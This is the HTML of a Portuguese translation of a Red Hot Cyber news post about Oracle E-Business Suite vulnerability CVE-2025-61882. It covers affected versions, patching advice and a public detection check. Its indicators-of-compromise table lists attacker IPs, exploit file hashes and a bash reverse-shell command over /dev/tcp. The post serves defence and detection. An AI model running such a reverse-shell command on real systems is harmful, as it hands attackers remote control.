Código HTML do Conteúdo
Post: Vulnerabilidade do Oracle E-Business Suite 9.8: Atualizações Urgentes Necessárias
<div>
<div data-element_type="widget" data-id="914a4f5" data-widget_type="shortcode.default">
<div>
<div>
<p><span><b><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">Redazione RHC</a>:5 outubro 2025 21:29</b></span></p>
<p>A Oracle publicou um comunicado de segurança sobre uma vulnerabilidade crítica identificada como <strong><a href="https://www.redhotcyber.com/en/cve-details/?cve_id=CVE-2025-61882" target="_blank">CVE-2025-61882</a></strong> No <strong>Oracle E-Business Suite</strong> . A falha pode ser explorada <strong>remotamente sem autenticação</strong> , potencialmente permitindo que códigos maliciosos sejam executados em sistemas afetados.</p>
<p>A empresa recomenda que seus clientes <strong>Aplique imediatamente as atualizações descritas</strong> no aviso. A Oracle enfatiza a importância de <em>Manter <strong>Ativamente apoiado</strong> versões do produto e instalar todos os patches de segurança críticos imediatamente.</em> Em particular, atualizando patches críticos lançados em <strong>Outubro de 2023</strong> é um pré-requisito para a implementação de novas correções.</p>
<p>Para apoiar <strong>detecção e contenção imediatas</strong> de possíveis ataques, o alerta inclui uma matriz de risco com <strong>Indicadores de comprometimento</strong> , como endereços IP suspeitos, comandos e arquivos associados a explorações conhecidas.</p>
<h2>Produtos afetados e patches disponíveis</h2>
<p>O <a href="https://www.oracle.com/security-alerts/alert-cve-2025-61882.html" target="_blank">A vulnerabilidade afeta especificamente</a> <strong>Oracle E-Business Suite versões 12.2.3 a 12.2.14</strong> . A documentação oficial, disponível através dos links fornecidos pela Oracle, contém informações detalhadas sobre os patches e como instalá-los.</p>
<h2>Suporte e versões legadas</h2>
<p>Patches fornecidos por meio do <strong>Alerta de segurança</strong> estão disponíveis apenas para versões cobertas por <strong>Suporte Premier</strong> ou <strong>Suporte estendido</strong> de acordo com a Política de Suporte Vitalício da Oracle.</p>
<p>As versões não incluídas nesses programas não são testadas quanto a vulnerabilidades relatadas, mesmo que ainda possam ser afetadas. Por esse motivo, a Oracle recomenda <strong>Atualizando para versões suportadas</strong> para garantir proteção e compatibilidade com patches de segurança.</p>
<h2>Como verificar se você é afetado pelo bug</h2>
<p><strong><a href="https://www.redhotcyber.com/en/cve-details/?cve_id=CVE-2025-61882" target="_blank">CVE-2025-61882</a></strong> Afeta <strong>Oracle E-Business Suite</strong> e é explorável remotamente sem autenticação, resultando potencialmente na execução remota de código se explorado com sucesso.</p>
<p><a href="https://github.com/rxerium/CVE-2025-61882" target="_blank">Um método de detecção público foi publicado em <strong>GitHub</strong></a> que ajuda a identificar instâncias potencialmente desatualizadas. O método sinaliza uma instância como suspeita quando a página retorna a cadeia de caracteres <strong>“Página inicial do E-Business Suite”</strong> e o HTTP <strong>Última modificação</strong> relatórios de cabeçalho uma data anterior <strong>4 de outubro de 2025</strong> (Carimbo de data/hora do Unix <strong>1759602752</strong> ).</p>
<p>Essa abordagem é <em>descrito como uma ferramenta de detecção, não um vetor de ataque</em> – e deve ser usado apenas para fins de verificação e defesa. Para reduzir o risco, a Oracle recomenda aplicar os patches descritos no comunicado de segurança e atualizar para as versões suportadas.</p>
<h2>Indicadores de Comprometimento (IOC)</h2>
<p>Abaixo estão os indicadores de comprometimento (endereços IP, comandos observados e arquivos) para dar suporte à detecção, investigação e contenção imediatas.</p>
<figure>
<table>
<thead>
<tr>
<th>Indicador</th>
<th>Tipo</th>
<th>Descrição</th>
</tr>
</thead>
<tbody>
<tr>
<td>200[.]107[.]207[.]26</td>
<td>Propriedade intelectual</td>
<td>Atividade potencial de GET e POST</td>
</tr>
<tr>
<td>185[.]181[.]60[.]11</td>
<td>Propriedade intelectual</td>
<td>Atividade potencial de GET e POST</td>
</tr>
<tr>
<td>sh -c /bin/bash -i >& /dev/tcp//0>&1</td>
<td>Comando</td>
<td>Estabelecer uma conexão TCP de saída em uma porta específica</td>
</tr>
<tr>
<td>76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d</td>
<td>SHA 256</td>
<td>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip</td>
</tr>
<tr>
<td>aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121</td>
<td>SHA 256</td>
<td>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py</td>
</tr>
<tr>
<td>6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b</td>
<td>SHA 256</td>
<td>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py</td>
</tr>
</tbody>
</table>
</figure>
<div>
<div>
<div>
<div>
<p><b><span>Redação</span></b><br /><span>A equipe editorial da Red Hot Cyber é composta por um grupo de indivíduos e fontes anônimas que colaboram ativamente para fornecer informações e notícias antecipadas sobre segurança cibernética e computação em geral.</span></p>
<p><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">Lista degli articoli</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>